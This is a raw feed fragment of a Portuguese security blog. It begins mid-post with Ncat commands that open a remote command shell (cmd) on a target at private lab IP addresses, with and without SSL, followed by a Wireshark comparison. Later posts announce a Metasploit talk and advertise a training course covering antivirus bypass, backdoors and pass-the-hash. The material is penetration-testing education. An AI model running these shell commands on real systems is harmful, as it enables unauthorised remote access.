href="http://4.bp.blogspot.com/-Z4gjtkrGNpU/TrOaEzmGJbI/AAAAAAAAAYQ/dv9RShNjxNI/s1600/ScreenShot032.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="208" src="http://4.bp.blogspot.com/-Z4gjtkrGNpU/TrOaEzmGJbI/AAAAAAAAAYQ/dv9RShNjxNI/s400/ScreenShot032.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;E na máquina do atacante digite: ncat -v 192.168.0.147 1337&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-0B7lLKQ6Xdw/TrOaYH_cmVI/AAAAAAAAAYY/uveO1Tcz-7w/s1600/ScreenShot033.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="120" src="http://4.bp.blogspot.com/-0B7lLKQ6Xdw/TrOaYH_cmVI/AAAAAAAAAYY/uveO1Tcz-7w/s400/ScreenShot033.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Com SSL&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;No alvo digite o comando: ncat.exe -v -l 1337 --ssl -e cmd --allow 192.168.0.125&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3pCCOVF_hSQ/TrOam4OizqI/AAAAAAAAAYg/1rIPZ2qpt6k/s1600/ScreenShot034.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="203" src="http://1.bp.blogspot.com/-3pCCOVF_hSQ/TrOam4OizqI/AAAAAAAAAYg/1rIPZ2qpt6k/s400/ScreenShot034.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;E na máquina do atacante digite: ncat -v --ssl 192.168.0.147 1337&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-w-l-ZyCikXw/TrOav-yA4BI/AAAAAAAAAYo/C6RwrVmdLEQ/s1600/ScreenShot035.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="87" src="http://3.bp.blogspot.com/-w-l-ZyCikXw/TrOav-yA4BI/AAAAAAAAAYo/C6RwrVmdLEQ/s400/ScreenShot035.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;Agora utilize o wireshark com apenas o filtro "tcp", em ambas as formas, clique com o botão direito do mouse nas conexões tcp e vá em "Follow Stream" e compare. :D&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif;"&gt;&lt;b&gt;Ncat Help&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: -webkit-auto;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif; font-size: 11px; text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Yv5uuwVHkfM/TrOdVhI84tI/AAAAAAAAAYw/A60H5ElKYmM/s1600/ScreenShot036.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-Yv5uuwVHkfM/TrOdVhI84tI/AAAAAAAAAYw/A60H5ElKYmM/s400/ScreenShot036.png" width="330" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Links:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;Ncat&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://nmap.org/ncat/"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;http://nmap.org/ncat/&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;Wireshark&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.wireshark.org/"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;http://www.wireshark.org/&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;:wq!&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-1648285033822177397?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/1648285033822177397/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/11/ncat-com-ssl.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/1648285033822177397'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/1648285033822177397'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/11/ncat-com-ssl.html' title='NCAT com SSL'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-Z4gjtkrGNpU/TrOaEzmGJbI/AAAAAAAAAYQ/dv9RShNjxNI/s72-c/ScreenShot032.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-814639052724734905</id><published>2011-10-29T00:54:00.000-02:00</published><updated>2011-10-29T00:54:11.299-02:00</updated><title type='text'>Palestra - "Metasploit Framework"</title><content type='html'>Depois de muito tempo, devido a falta de tempo realmente, aqui estou novamente de volta o meu blog, isso devido a minha nova "rotina" de vida, dividindo bem os horários pra sobrar tempo pra tudo e pra todos. Alguém ai disse que está com saudades de mim? Ah, dúvido! :P&lt;br /&gt;&lt;br /&gt;Pois bem, anteontem (27/10/2011) estive presente palestrando sobre o framework "Metasploit" e suas features no evento SEINFO (Semana de Sistemas da Informação), que está em sua 4ª edição organizado pela UNIESP (&lt;a href="http://www.uniesp.edu.br/prudente/"&gt;http://www.uniesp.edu.br/prudente/&lt;/a&gt;) da cidade de Presidente Prudente aqui do estado de São Paulo pra quem não conhece. :)&lt;br /&gt;&lt;br /&gt;Segue abaixo o slide utilizado.&lt;br /&gt;&lt;br /&gt;&lt;div style="width:510px" id="__ss_9931525"&gt;&lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/robertoespreto/slide-palestra-metasploit-framework" title="Slide Palestra &amp;quot;Metasploit Framework&amp;quot;" target="_blank"&gt;Slide Palestra &amp;quot;Metasploit Framework&amp;quot;&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/9931525" width="510" height="426" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt;View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/robertoespreto" target="_blank"&gt;Roberto Soares (espreto)&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;E segue também um vídeo de qualidade "duvidosa" abaixo. :P&lt;br /&gt;&lt;br /&gt;&lt;iframe width="480" height="360" src="http://www.youtube.com/embed/yFpA04agYOA" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;Obrigado e até o próximo post.&lt;br /&gt;&lt;br /&gt;Att,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-814639052724734905?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/814639052724734905/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/10/palestra-metasploit-framework.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/814639052724734905'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/814639052724734905'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/10/palestra-metasploit-framework.html' title='Palestra - &quot;Metasploit Framework&quot;'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/yFpA04agYOA/default.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-730842513322437783</id><published>2011-04-25T20:47:00.004-03:00</published><updated>2011-05-10T19:28:10.953-03:00</updated><title type='text'>Treinamento Metasploit Exploitation - Versão EaD</title><content type='html'>&lt;h3 class="post-title entry-title"&gt;&lt;a href="http://codesec.blogspot.com/2011/01/treinamento-metasploit-exploitation.html"&gt;&lt;/a&gt; &lt;/h3&gt;&lt;h1 align="center" style="text-align: center;"&gt;&lt;span style="font-size: 38pt;"&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 align="center" style="text-align: center;"&gt;&lt;span style="color: red; font-size: 38pt;"&gt;Treinamento&lt;/span&gt;&lt;/h1&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red; font-family: Cambria,serif; font-size: 38pt;"&gt;Metasploit Exploitation (EaD)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red; font-family: Cambria,serif; font-size: 38pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: #365f91; font-family: Cambria,serif; font-size: 36pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: black; font-family: Cambria,serif; font-size: 14pt;"&gt;Abril 2011&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Metasploit  é um verdadeiro canivete suíço presente no arsenal de um penetration  tester. É um framework com muitas capacidades diferentes e  espetaculares.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;A  comunidade em geral (usuários, desenvolvedores, hackers, etc...)  contribui em peso em seu desenvolvimento e manutenção. Além do vasto  número de exploits já incorporados em sua base e atualizados  diariamente.&amp;nbsp; O framework pode ser utilizado para o desenvolvimento de  novos exploits, fuzzing e o que sua imaginação permitir. Muitos  profissionais de segurança não conhecem os recursos avançados que o  framework oferece, em que o uso facilita muito em determinados testes.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Este  curso visa proporcionar um conhecimento aprofundado de vários recursos  presentes no framework que devem ser usados em um teste de intrusão ou  em uma análise de vulnerabilidades com maior eficácia. O curso tem  ênfase na prática, ou seja, mãos na massa, mas a teoria não será deixada  de lado, além de saber explorar, você também entenderá de maneira  fácil, o que está fazendo.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Os  participantes passarão a ter uma compreensão melhor, não apenas dos  aspectos técnicos de segurança, mas também experiência prática  essencial, bem como aprender a aplicar corretamente o conhecimento  adquirido de forma ética.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif; font-size: 14pt;"&gt;Diferencial:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Conhecimento  aprofundado através de exercícios práticos em características pouco  exploradas, mas extremamente úteis para um penetration tester presentes  no framework.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Estudos  de problemas que possam aparecer ao utilizar determinadas  particularidades do framework para que se possa obter uma melhor  qualidade nos resultados.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Com  um laboratório especialmente criado próximo do real, utilizaremos o  conhecimento obtido durante o curso e aplicamos em nosso alvo. Os  participantes terão que procurar as falhas, explorá-las, usar o  raciocínio lógico para desvendar alguns desafios e documentar os  resultados de uma forma abrangente.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif; font-size: 16pt;"&gt;Ementa:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Creating Lab for Testings.&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Introduction Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Recon and Scanning with Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Exercise: Finding vulnerabilities in Hack Training Lab.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Import Nessus/OpenVAS and Nmap scans.&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;db_autopwn.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Enumeration Services.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;DNS/SSH Tunneling. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Attacking Machines Windows. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Meterpreter.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Dissecting with Wireshark and Tcpdump.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Dumping Password Hashes.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Pass-the-hash with Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Sniffing.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Advanced Exploits and Payload options.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Evasion Techniques.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Attacking W2k Server.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Client-Side Exploitation.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Bypassing Anti-Virus with Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Creating .exe, .vbs e Java Payloads.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Encoding Payloads.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: Bypassing Anti-Virus.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Working with Meterpreter Scripts.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Smb_relay.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Backdoors.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Advanced &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Pivoting.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Internals &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Commands Windows.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: Exploration others internal machines in Hack Training Lab.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Timestomp.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;SQLMap Integration.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: Attacking Databases.&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;The Social Engineering Toolkit (SET).&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New 